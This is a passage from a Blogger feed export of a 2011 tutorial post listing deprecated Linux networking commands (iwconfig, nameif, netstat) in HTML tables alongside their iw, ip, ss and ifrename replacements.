Sets the operating mode of the wireless device. The &lt;strong&gt;[mode]&lt;/strong&gt; can be &lt;strong&gt;Ad-Hoc&lt;/strong&gt;, &lt;strong&gt;Auto&lt;/strong&gt;, &lt;strong&gt;Managed&lt;/strong&gt;, &lt;strong&gt;Master&lt;/strong&gt;, &lt;strong&gt;Monitor, Repeater&lt;/strong&gt;, or &lt;strong&gt;Secondary&lt;/strong&gt;.&lt;strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Ad-Hoc&lt;/strong&gt;: the network is composed of only one cell and without an access point.&lt;br /&gt;
&lt;strong&gt;Managed&lt;/strong&gt;: the wireless node connects to a network composed of many access points, with roaming.&lt;br /&gt;
&lt;strong&gt;Master&lt;/strong&gt;: the wireless node is the synchronization master, or it acts as an access point.&lt;br /&gt;
&lt;strong&gt;Monitor&lt;/strong&gt;: the wireless node is not associated with any cell and passively monitors all packets on the frequency.&lt;br /&gt;
&lt;strong&gt;Repeater&lt;/strong&gt;: the wireless node forwards packets between other wireless nodes.&lt;br /&gt;
&lt;strong&gt;Secondary&lt;/strong&gt;: the wireless node acts as a backup master/repeater.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] modu [modulation]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Forces the wireless adapter to use a specific set of modulations. Modern
 adapters support various modulations, such as 802.11b or 802.11g. The 
list of available modulations depends on the adapter/driver and can be 
displayed using &lt;strong&gt;iwlist modulation&lt;/strong&gt;. Some options are &lt;strong&gt;11g&lt;/strong&gt;, &lt;strong&gt;CCK OFDMa&lt;/strong&gt;, and &lt;strong&gt;auto&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] nick [name]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the nick name (or station name).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] nwid [name]&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Sets the Network ID for the WLAN. &lt;em&gt;This parameter is only used for pre-802.11 hardware&lt;/em&gt;
 as the 802.11 protocol uses the ESSID and access point address for this
 function. With some wireless adapters, you can disable the Network ID 
checking (NWID promiscuous) with &lt;strong&gt;off&lt;/strong&gt;&lt;em&gt;&lt;/em&gt; (and &lt;strong&gt;on&lt;/strong&gt; &lt;em&gt;&lt;/em&gt;to re-enable it).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] power [option]&lt;br /&gt;
&lt;strong&gt;iwconfig [interface] power&lt;/strong&gt; min | max [secondsu | secondsm]&lt;br /&gt;
iwconfig [interface] power mode [mode]&lt;br /&gt;
iwconfig [interface] power on | off&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Configures the power management scheme and mode. Valid &lt;strong&gt;[options]&lt;/strong&gt; are: &lt;strong&gt;period [value]&lt;/strong&gt; (sets the period between wake ups), &lt;strong&gt;timeout [value]&lt;/strong&gt; (sets the timeout before going back to sleep), &lt;strong&gt;saving [value]&lt;/strong&gt; (sets the generic level of power saving).&lt;br /&gt;
The &lt;strong&gt;min&lt;/strong&gt; and &lt;strong&gt;max&lt;/strong&gt; modifiers are in seconds by default, but append the suffices &lt;strong&gt;m&lt;/strong&gt; or &lt;strong&gt;u&lt;/strong&gt; to specify values in milliseconds or microseconds.&lt;br /&gt;
Valid &lt;strong&gt;[mode]&lt;/strong&gt; options are: &lt;strong&gt;all&lt;/strong&gt; (receive all packets), &lt;strong&gt;unicast&lt;/strong&gt; (receive unicast packets only, discard multicast and broadcast) and &lt;strong&gt;multicast&lt;/strong&gt; (receive multicast and broadcast only, discard unicast packets).&lt;br /&gt;
&lt;strong&gt;On&lt;/strong&gt; and &lt;strong&gt;off&lt;/strong&gt; re-enable or disable power management.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent; some power commands are:&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;&lt;br /&gt;
.&lt;br /&gt;
iw dev [interface] set power_save on&lt;br /&gt;
.&lt;/strong&gt;&lt;strong&gt;&lt;br /&gt;
iw dev [interface] get power_save&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] rate/bit [rate]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the bit rate in bits per second for cards supporting multiple bit 
rates. The bit-rate is the speed at which bits are transmitted over the 
medium, the user speed of the link is lower due to medium sharing and 
various overhead.Suffixes &lt;strong&gt;k&lt;/strong&gt;, &lt;strong&gt;M&lt;/strong&gt; or &lt;strong&gt;G&lt;/strong&gt; can be added to the numeric &lt;strong&gt;[rate]&lt;/strong&gt; (decimal multiplier : 10^3, 10^6 and 10^9 b/s), or add ‘&lt;strong&gt;0&lt;/strong&gt;‘ for enough. The &lt;strong&gt;[rate]&lt;/strong&gt; can also be &lt;strong&gt;auto&lt;/strong&gt; to select automatic bit-rate mode (fallback to lower rate on noisy channels), or &lt;strong&gt;fixed&lt;/strong&gt; to revert back to fixed setting. If you specify a bit-rate numeric value and append &lt;strong&gt;auto&lt;/strong&gt;, the driver will use all bit-rates lower and equal than this value.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iw [interface] set bitrates legacy-2.4 12 18 24&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] retry [option] [value]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
To set the maximum number of retries (MAC retransmissions), enter &lt;strong&gt;limit [value]&lt;/strong&gt;. To set the maximum length of time the MAC should retry, enter &lt;strong&gt;lifetime [value]&lt;/strong&gt;. By default, this value is in seconds; append the suffices &lt;strong&gt;m&lt;/strong&gt; or &lt;strong&gt;u&lt;/strong&gt; to specify values in milliseconds or microseconds. You can also add the &lt;strong&gt;short&lt;/strong&gt;, &lt;strong&gt;long&lt;/strong&gt;, &lt;strong&gt;min&lt;/strong&gt; and &lt;strong&gt;max&lt;/strong&gt; modifiers.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] rts [threshold]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the size of the smallest packet for which the node sends RTS; a 
value equal to the maximum packet size disables the mechanism. You may 
also set the threshold parameter to &lt;strong&gt;auto&lt;/strong&gt;, &lt;strong&gt;fixed&lt;/strong&gt; or &lt;strong&gt;off&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] sens [threshold]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the sensitivity threshold (defines how sensitive the wireless 
adapter is to poor operating conditions such as low signal, signal 
interference, etc). Modern adapter designs seem to control these 
thresholds automatically.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig [interface] txpower [value]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
For adapters supporting multiple transmit powers, this sets the transmit power in dBm. If &lt;strong&gt;W&lt;/strong&gt; is the power in Watt, the power in dBm is P = 30 + 10.log(W). If the &lt;strong&gt;[value]&lt;/strong&gt; is postfixed by &lt;strong&gt;mW&lt;/strong&gt;, it will be automatically converted to dBm. In addition, &lt;strong&gt;on&lt;/strong&gt; and &lt;strong&gt;off&lt;/strong&gt; enable and disable the radio, and &lt;strong&gt;auto&lt;/strong&gt; and &lt;strong&gt;fixed&lt;/strong&gt; enable and disable power control (if those features are available).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iw dev [interface] set txpower [auto | fixed | |limit] [tx power in mBm]&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;iw phy [phyname] set txpower [auto | fixed | limit] [tx power in mBm]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig –help&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Displays the iwconfig help message.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iw help&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig –version&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Displays the version of iwconfig installed.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iw –version&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
Some examples of the &lt;strong&gt;iw&lt;/strong&gt; command syntax are as follows.&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;iw dev wlan0 link&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;iw wlan0 connect CoffeeShopWLAN&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;iw wlan0 connect HomeWLAN keys 0:abcde d:1:0011223344 &lt;/strong&gt;(for WEP)&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;br /&gt;
&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="nameif"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h2&gt;

Nameif&lt;/h2&gt;
&lt;table border="1" style="width: 680px;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Deprecated nameif commands&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;nameif [name] [mac_address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
If no name and MAC address are provided, it attempts to read addresses from &lt;em&gt;/etc/mactab&lt;/em&gt;. Each line of &lt;em&gt;mactab&lt;/em&gt; should contain an interface name and MAC address (or comments starting with #).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set dev [interface] name [name]&lt;br /&gt;
.&lt;br /&gt;
ifrename -i [interface] -n [newname]&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;nameif -c [config_file]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Reads from &lt;strong&gt;[config_file]&lt;/strong&gt; instead of &lt;em&gt;/etc/mactab&lt;/em&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifrename -c [config_file]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;nameif -s&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Error messages are sent to the syslog.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="netstat"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h2&gt;

Netstat&lt;/h2&gt;
&lt;table border="1" style="width: 680px;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Deprecated netstat commands&lt;br /&gt;
&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -a &lt;/strong&gt;or&lt;strong&gt; –all&lt;br /&gt;
&lt;/strong&gt;.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;Shows both listening and non-listening sockets.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -a &lt;/strong&gt;or&lt;strong&gt; –all&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -A &lt;/strong&gt; &lt;strong&gt;[family]&lt;/strong&gt; or&lt;strong&gt; –protocol=[family]&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Specifies the address families for which connections are to be shown. &lt;strong&gt;[family]&lt;/strong&gt; is a comma separated list of address family keywords like &lt;strong&gt;inet&lt;/strong&gt;, &lt;strong&gt;unix&lt;/strong&gt;, &lt;strong&gt;ipx&lt;/strong&gt;, &lt;strong&gt;ax25&lt;/strong&gt;, &lt;strong&gt;netrom&lt;/strong&gt;, and &lt;strong&gt;ddp&lt;/strong&gt;. This has the same effect as using the &lt;strong&gt;–inet&lt;/strong&gt;, &lt;strong&gt;–unix (-x)&lt;/strong&gt;, &lt;strong&gt;–ipx&lt;/strong&gt;, &lt;strong&gt;–ax25&lt;/strong&gt;, &lt;strong&gt;–netrom&lt;/strong&gt;, and &lt;strong&gt;–ddp&lt;/strong&gt; options.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -f [family]&lt;/strong&gt; or &lt;strong&gt;–family=[family]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Families: &lt;strong&gt;unix&lt;/strong&gt;, &lt;strong&gt;inet&lt;/strong&gt;, &lt;strong&gt;inet6&lt;/strong&gt;, &lt;strong&gt;link&lt;/strong&gt;, &lt;strong&gt;netlink&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -c&lt;/strong&gt; or &lt;strong&gt;–continuous&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Configures &lt;strong&gt;netstat&lt;/strong&gt; to refresh the displayed information every second until stopped.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -C&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Prints routing information from the route cache.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route list cache&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -e&lt;/strong&gt; or &lt;strong&gt;–extend&lt;br /&gt;
&lt;/strong&gt;.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;Displays an increased level of detail. Can be entered as twice (as &lt;strong&gt;–ee&lt;/strong&gt;) for maximum details.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -e&lt;/strong&gt; or &lt;strong&gt;–extended&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -F&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Prints routing information from the forward information database (FIB).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -g&lt;/strong&gt; or &lt;strong&gt;–groups&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Displays multicast group membership information for IPv4 and IPv6.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip maddr&lt;/strong&gt;, &lt;strong&gt;ip maddr show [interface]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -i &lt;/strong&gt;or&lt;strong&gt; –interface=[name]&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Displays a table of all network interfaces, or the specified&lt;strong&gt; [name].&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip -s link&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -l &lt;/strong&gt;or&lt;strong&gt; –listening&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Shows only listening sockets (which are omitted by &lt;strong&gt;netstat&lt;/strong&gt; be default).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -l &lt;/strong&gt;or&lt;strong&gt; –listening&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -M&lt;/strong&gt; or &lt;strong&gt;–masquerade&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Displays a list of masqueraded connections (connections being altered by Network Address Translation).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -n &lt;/strong&gt;or&lt;strong&gt; –numeric&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Show numerical addresses instead of trying to determine symbolic host, port or user names (skips DNS translation).&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -n&lt;/strong&gt; or &lt;strong&gt;–numeric&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat –numeric-hosts&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Shows numerical host addresses but does not affect the resolution of port or user names.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat –numeric ports&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Shows numerical port numbers but does not affect the resolution of host or user names.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat –numeric-users&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Shows numerical user IDs but does not affect the resolution of host or port names.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -N&lt;/strong&gt; or &lt;strong&gt;–symbolic&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Displays the symbolic host, port, or user names instead of numerical representations. &lt;strong&gt;Netstat&lt;/strong&gt; does this by default.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -r&lt;/strong&gt; or &lt;strong&gt;–resolve&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -o&lt;/strong&gt; or &lt;strong&gt;–timers&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Includes information related to networking timers.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -o&lt;/strong&gt; or &lt;strong&gt;–options&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -p&lt;/strong&gt; or &lt;strong&gt;–program&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Shows the process ID (PID) and name of the program to which each socket belongs.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -p&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -r &lt;/strong&gt;or&lt;strong&gt; –route&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Shows the kernel routing tables.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip route&lt;/strong&gt;, &lt;strong&gt;ip route show all&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -s&lt;/strong&gt; or&lt;strong&gt; –statistics&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Displays summary statistics for each protocol.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -s&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -t &lt;/strong&gt;or&lt;strong&gt; –tcp&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Filters results to display TCP only.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -t &lt;/strong&gt;or&lt;strong&gt; –tcp&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -T &lt;/strong&gt;or&lt;strong&gt; –notrim&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Stops trimming long addresses.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -u &lt;/strong&gt;or&lt;strong&gt; –udp&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Filters results to display UDP only.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss -u &lt;/strong&gt;or&lt;strong&gt; –udp&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -v &lt;/strong&gt;or&lt;strong&gt; –verbose&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Produces verbose output.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -w&lt;/strong&gt; or &lt;strong&gt;–raw&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Filter results to display raw sockets only.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss-w&lt;/strong&gt; or &lt;strong&gt;–raw&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat -Z &lt;/strong&gt;or&lt;strong&gt; –context&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Prints the SELinux
 context if SELinux is enabled. On hosts running SELinux, all processes 
and files are labeled in a way that represents security-relevant 
information. This information is called the SELinux context.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="route"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h2&gt;
&lt;a href="http://www.hackplanet.in/2011/12/replacements-for-linux-commands.html" target="_blank"&gt;Click here to go to Next part : Part 3&lt;/a&gt;&lt;/h2&gt;
&lt;span class="fullpost"&gt;

&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-3733182154738330370?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/3733182154738330370/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/replacements-for-linux-commands-part-2.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3733182154738330370?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3733182154738330370?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/replacements-for-linux-commands-part-2.html' title='Replacements for Linux Commands : Part 2'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-6PfosDAruFg/Tv_ZsJGlMMI/AAAAAAAABAA/1MiMGjDz930/s72-c/HNY.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CkEARXszfSp7ImA9WhRWE0Q.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-3866636474287988005</id><published>2011-12-31T11:15:00.000-08:00</published><updated>2011-12-31T20:04:04.585-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-31T20:04:04.585-08:00</app:edited><title>Replacements for Linux Commands : Part 1</title><content type='html'>&lt;br /&gt;
&lt;div class="MsoNormal" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; margin-bottom: 5.25pt; margin-left: 0in; margin-right: 0in; margin-top: 3.75pt;"&gt;
&lt;b&gt;&lt;span style="font-family: 'Lucida Sans Unicode', sans-serif;"&gt;&lt;br class="Apple-interchange-newline" /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; margin-bottom: 0in;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-ce-h6fud9KU/Tv_TOB3raTI/AAAAAAAAA_0/U3rSdoD03U8/s1600/HNY.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span style="color: black;"&gt;&lt;img border="0" height="266" src="http://2.bp.blogspot.com/-ce-h6fud9KU/Tv_TOB3raTI/AAAAAAAAA_0/U3rSdoD03U8/s400/HNY.jpg" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
